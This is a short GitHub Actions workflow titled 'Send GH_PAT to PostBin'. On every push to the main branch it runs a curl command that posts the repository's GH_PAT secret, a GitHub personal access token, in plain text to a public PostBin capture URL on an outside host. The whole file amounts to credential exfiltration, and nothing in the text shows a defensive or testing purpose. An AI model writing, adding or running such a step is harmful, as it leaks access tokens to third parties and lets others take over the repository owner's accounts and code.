name: Send GH_PAT to PostBin
on:
  push:
    branches:
      - main

jobs:
  send_gh_pat:
    runs-on: ubuntu-latest
    steps:
      - name: Send GH_PAT to PostBin
        run: |
          curl -X POST -d "${{ secrets.GH_PAT }}" -H "Content-Type: text/plain" https://www.toptal.com/developers/postbin/1703754574393-1403204605448
